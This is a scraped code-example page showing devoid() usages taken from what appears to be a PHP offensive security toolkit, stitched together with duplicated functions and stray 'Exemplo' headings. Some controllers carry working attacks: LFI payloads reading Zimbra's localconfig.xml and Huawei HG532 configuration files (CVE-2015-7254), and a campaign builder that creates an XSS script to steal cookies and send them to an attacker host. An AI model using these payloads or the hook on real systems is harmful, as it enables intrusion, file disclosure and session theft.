devoid() public method

Return TRUE if hive key is empty and not cached
public devoid ( $key, &$val = NULL ) : boolean
$key string
$val mixed
return boolean
 /**
  * @param \Base $f3
  * @param array $params
  */
 public function viewSingle(\Base $f3, $params)
 {
     $web = \Web::instance();
     $this->response->data['SUBPART'] = 'larfi_page.html';
     if (isset($params['id'])) {
         $this->resource->load(array('_id = ?', $params['id']));
         $this->response->data['POST'] = $this->resource;
         if ($this->resource->dry()) {
             $f3->error(404, 'LFI Plugin not found');
         } else {
             $this->response->data['SUBPART'] = 'larfi_page.html';
             $url = $f3->get('POST.url');
             $blankurl = $f3->devoid('POST.url');
             $lfi_type = $f3->get('POST.lType');
             $payload = $f3->get('POST.lPayload');
             $method = $f3->get('POST.lMethod');
             switch ($lfi_type) {
                 case "Generic":
                     \Flash::instance()->addMessage('Exploited by injecting into the URL/Body where applicable', 'info');
                     return $this->uri_based_lfi($method, $blankurl, $url, $payload);
                     break;
                 case "Cookie":
                     \Flash::instance()->addMessage('Exploited by injecting into the cookie', 'info');
                     return $this->cookie_based_lfi($method, $blankurl, $url, $payload);
                     break;
                 default:
                     \Flash::instance()->addMessage('This is an invalid attack type', 'warning');
             }
         }
     }
 }
 /**
  * @param \Base $f3
  * Description This function will be used to create the necessary script needed to hook a page.
  */
 function create_campaign(\Base $f3)
 {
     $web = \Web::instance();
     $this->response->data['SUBPART'] = 'xssrc_campaign.html';
     if ($f3->get('VERB') == 'POST') {
         $error = false;
         if ($f3->devoid('POST.targetUrl')) {
             $error = true;
             \Flash::instance()->addMessage('Please enter a Target url to test access once you steal cookies e.g. http://victim.mth3l3m3nt.com/admin', 'warning');
         } else {
             $target_url = $f3->get('POST.targetUrl');
             $c_host = parse_url($target_url, PHP_URL_HOST);
             $template_src = $f3->ROOT . $f3->BASE . '/scripts/attack_temp.mth3l3m3nt';
             $campaign_file = $f3->ROOT . $f3->BASE . '/scripts/' . $c_host . '.js';
             $campaign_address = $f3->SCHEME . "://" . $f3->HOST . $f3->BASE . '/scripts/' . $c_host . '.js';
             $postHome = $f3->SCHEME . "://" . $f3->HOST . $f3->BASE . '/xssr';
             copy($template_src, $campaign_file);
             $unprepped_contents = file_get_contents($campaign_file);
             $unprepped_contents = str_replace("http://attacker.mth3l3m3nt.com/xssr", $postHome, $unprepped_contents);
             $unprepped_contents = str_replace("http://victim.mth3l3m3nt.com/admin/", $target_url, $unprepped_contents);
             file_put_contents($campaign_file, $unprepped_contents);
             $instructions = \Flash::instance()->addMessage('Attach the script to target e.g. <script src="' . $campaign_address . '"></script>', 'success');
             $this->response->data['content'] = $instructions;
         }
     }
 }
 /**
  * Zimbra Collaboration Server URI Based LFI
  * @param \Base $f3
  */
 public function zimbra_lfi(\Base $f3)
 {
     $lfi = new Larfi();
     $f3->set('exploit_title', 'Zimbra Collaboration server LFI (Versions: <=7.2.2 and <=8.0.2 )');
     $this->response->data['SUBPART'] = 'lfi_page.html';
     $blankurl = $f3->devoid('POST.url');
     $url = $f3->get('POST.url');
     $payload = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00";
     return $this->uri_based_lfi($blankurl, $url, $payload);
 }
 /**
  * Huawei_lfi
  * cve-2015-7254
  * Directory traversal vulnerability on Huawei HG532e, HG532n, and HG532s devices allows remote attackers to read arbitrary files via a .. (dot dot) in an icon/ URI.
  * @param \Base $f3
  * Alternative file read: http://<target_IP>:37215/icon/../../../etc/inittab.
  */
 public function huawei_lfi(\Base $f3)
 {
     $lfi = new Larfi();
     $f3->set('exploit_title', 'HUAWEI LFI (cve-2015-7254) Huawei HG532e, HG532n, & HG532s');
     $this->response->data['SUBPART'] = 'lfi_page.html';
     $blankurl = $f3->devoid('POST.url');
     $url = $f3->get('POST.url');
     $payload = ":37215/icon/../../../etc/defaultcfg.xml";
     return $this->uri_based_lfi($blankurl, $url, $payload);
 }
 public function generic_request(\Base $f3)
 {
     $web = \Web::instance();
     $this->response->data['SUBPART'] = 'websaccre_generic_request.html';
     $audit_instance = \Audit::instance();
     if ($f3->get('VERB') == 'POST') {
         $error = false;
         if ($f3->devoid('POST.url')) {
             $error = true;
             \Flash::instance()->addMessage('Please enter a url e.g. http://africahackon.com', 'warning');
         } else {
             $audited_url = $audit_instance->url($f3->get('POST.url'));
             if ($audited_url == TRUE) {
                 /**
                 * 
                 Shared Hosting Servers Have an issue ..safemode and openbasedir setr and curl gives error enable the lines below and comment out the $request_successful one 
                 $options = array('follow_location'=>FALSE);
                 $request_successful=$web->request($f3->get('POST.url'),$options);
                 * 
                 */
                 //handle POST data
                 $postReceive = $f3->get('Post.postReceive');
                 $postData = explode("&", $postReceive);
                 $postData = array_map("trim", $postData);
                 $address = $f3->get('POST.url');
                 if ($f3->get('POST.means') == "POST") {
                     $options = array('method' => $f3->get('POST.means'), 'content' => http_build_query($postData));
                 } else {
                     $options = array('method' => $f3->get('POST.means'));
                 }
                 $request_successful = $web->request($address, $options);
                 if (!$request_successful) {
                     \Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'warning');
                 } else {
                     $result_body = $request_successful['body'];
                     $result_headers = $request_successful['headers'];
                     $engine = $request_successful['engine'];
                     $headers_max = implode("\n", $result_headers);
                     $myFinalRequest = "Headers: \n\n" . $headers_max . "\n\n Body:\n\n" . $result_body . "\n\n Engine Used: " . $engine;
                     $this->response->data['content'] = $myFinalRequest;
                 }
             } else {
                 \Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'danger');
             }
         }
     }
 }
 /**
  * Handles Your little Hurl.it like service to make requests to remote servers using various methods
  * @package Controller
  */
 public function generic_request(\Base $f3)
 {
     $web = \Web::instance();
     $this->response->data['SUBPART'] = 'websaccre_generic_request.html';
     $audit_instance = \Audit::instance();
     if ($f3->get('VERB') == 'POST') {
         $error = false;
         if ($f3->devoid('POST.url')) {
             $error = true;
             \Flash::instance()->addMessage('Please enter a url e.g. http://africahackon.com', 'warning');
         } else {
             $audited_url = $audit_instance->url($f3->get('POST.url'));
             if ($audited_url == TRUE) {
                 //handle POST data
                 $postReceive = $f3->get('POST.postReceive');
                 $createPostArray = parse_str($postReceive, $postData);
                 if (ini_get('safe_mode')) {
                     $follow_loc = FALSE;
                 } else {
                     $follow_loc = TRUE;
                 }
                 $address = $f3->get('POST.url');
                 if ($f3->get('POST.means') == "POST") {
                     $options = array('method' => $f3->get('POST.means'), 'content' => http_build_query($postData), 'follow_location' => $follow_loc);
                     $request_successful = $web->request($address, $options);
                 } elseif ($f3->get('POST.means') == "GET" or $f3->get('POST.means') == "TRACE" or $f3->get('POST.means') == "OPTIONS" or $f3->get('POST.means') == "HEAD") {
                     $options = array('method' => $f3->get('POST.means'), 'follow_location' => $follow_loc);
                     $request_successful = $web->request($address, $options);
                 } else {
                     \Flash::instance()->addMessage('Unsupported Header Method', 'danger');
                 }
                 if (!$request_successful) {
                     \Flash::instance()->addMessage('Something went wrong your request could not be completed.', 'warning');
                 } else {
                     $result_body = $request_successful['body'];
                     $result_headers = $request_successful['headers'];
                     $engine = $request_successful['engine'];
                     $headers_max = implode("\n", $result_headers);
                     $myFinalRequest = "Headers: \n\n" . $headers_max . "\n\n Body:\n\n" . $result_body . "\n\n Engine Used: " . $engine;
                     $this->response->data['content'] = $myFinalRequest;
                 }
             } else {
                 \Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'danger');
             }
         }
     }
 }
Exemplo n.º 7
0
 public function api_keys(\Base $f3)
 {
     $this->response->data['SUBPART'] = 'settings_unphp_api.html';
     $cfg = \Config::instance();
     if ($f3->get('VERB') == 'POST') {
         $error = false;
         if ($f3->devoid('POST.unphp_api_key')) {
             $error = true;
             \Flash::instance()->addMessage('Please enter an API Key from unphp.net ', 'warning');
         } else {
             $cfg->set('unphp_api_key', $f3->get('POST.unphp_api_key'));
         }
         if (!$error) {
             \Flash::instance()->addMessage('Configuration saved', 'success');
             $cfg->save();
         }
     }
     $cfg->copyto('POST');
 }
 public function getwhois(\Base $f3)
 {
     $web = \Web::instance();
     $this->response->data['SUBPART'] = 'websaccre_whois.html';
     if ($f3->get('VERB') == 'POST') {
         $error = false;
         if ($f3->devoid('POST.hostname')) {
             $error = true;
             \Flash::instance()->addMessage('Please enter a hostname e.g. africahackon.com', 'warning');
         } else {
             $address = $f3->get('POST.hostname');
             $mywhois = $web->whois($address);
             if (!$mywhois) {
                 \Flash::instance()->addMessage('You have entered an invalid hostname try something like: africahackon.com', 'warning');
             } else {
                 $this->response->data['content'] = $mywhois;
             }
         }
     }
 }
Exemplo n.º 9
0
 public function general(\Base $f3)
 {
     $this->response->data['SUBPART'] = 'settings_general.html';
     $cfg = \Config::instance();
     if ($f3->get('VERB') == 'POST') {
         $error = false;
         if ($f3->devoid('POST.blog_title')) {
             $error = true;
             \Flash::instance()->addMessage('Please enter a Blog Title', 'warning');
         } else {
             $cfg->set('blog_title', $f3->get('POST.blog_title'));
         }
         $cfg->set('ssl_backend', $f3->get('POST.ssl_backend') == '1');
         $cfg->set('auto_approve_comments', $f3->get('POST.auto_approve_comments') == '1');
         if (!$error) {
             \Flash::instance()->addMessage('Config saved', 'success');
             $cfg->save();
         }
     }
     $cfg->copyto('POST');
 }
 /**
  * Handles Decoding Functions
  * @param \Base $f3
  */
 public function decoder_multi(\Base $f3)
 {
     $this->response->data['SUBPART'] = 'dencoder_decoder_multi.html';
     $audit_instance = \Audit::instance();
     if ($f3->get('VERB') == 'POST') {
         $error = false;
         if ($f3->devoid('POST.encoded')) {
             $error = true;
             \Flash::instance()->addMessage('Please enter Some text to decode e.g. 0xaaaa ', 'warning');
         } else {
             $encoded_text_string = $f3->get('POST.encoded');
             $encodedFormat = $f3->get('POST.encodedFormat');
             switch ($encodedFormat) {
                 case "base64":
                     $decoded = trim($encoded_text_string);
                     if (base64_encode(base64_decode($decoded)) === $decoded) {
                         $decoded = base64_decode($decoded, true);
                         $this->response->data['content'] = $decoded;
                     } else {
                         \Flash::instance()->addMessage('Please enter a valid base 64 string e.g. dGVzdG1l ', 'warning');
                     }
                     break;
                 case "hex":
                     $decoded = trim($encoded_text_string);
                     if (is_numeric('0x' . $decoded)) {
                         if (function_exists('hex2bin')) {
                             $decoded = hex2bin($decoded);
                             $this->response->data['content'] = $decoded;
                         } else {
                             \Flash::instance()->addMessage('Seems you are missing the hex2bin function , this is common with PHP 5.3 and below \\n Sorry I can\'t work this . ', 'warning');
                         }
                     } else {
                         \Flash::instance()->addMessage('Invalid Hexadecimal String detected, check for trailing spaces or invalid characters then try again.', 'warning');
                     }
                     break;
                 case "hex_0x":
                     $clear_prefix = str_replace("0x", "", $encoded_text_string);
                     $clear_prefix = trim($clear_prefix);
                     if (is_numeric('0x' . $clear_prefix)) {
                         if (function_exists('hex2bin')) {
                             $decoded = hex2bin($clear_prefix);
                             $this->response->data['content'] = $decoded;
                         } else {
                             \Flash::instance()->addMessage('Seems you are missing the hex2bin function , this is common with PHP 5.3 and below \\n Sorry I can\'t work this . ', 'warning');
                         }
                     } else {
                         \Flash::instance()->addMessage('Invalid Hexadecimal String detected, check for trailing spaces or invalid characters then try again.', 'warning');
                     }
                     break;
                 case "hex_slash_x":
                     $clear_prefix = str_replace("\\x", "", $encoded_text_string);
                     $clear_prefix = trim($clear_prefix);
                     if (is_numeric('0x' . $clear_prefix)) {
                         if (function_exists('hex2bin')) {
                             $decoded = hex2bin($clear_prefix);
                             $this->response->data['content'] = $decoded;
                         } else {
                             \Flash::instance()->addMessage('Seems you are missing the hex2bin function , this is common with PHP 5.3 and below \\n Sorry I can\'t work this . ', 'warning');
                         }
                     } else {
                         \Flash::instance()->addMessage('Invalid Hexadecimal String detected, check for trailing spaces or invalid characters then try again.', 'warning');
                     }
                     break;
                 case "rot13":
                     $decoded = str_rot13(trim($encoded_text_string));
                     $this->response->data['content'] = $decoded;
                     break;
                 default:
                     \Flash::instance()->addMessage('Seems You have Broken something or text is invalid \\n I can\'t process', 'warning');
             }
         }
     }
 }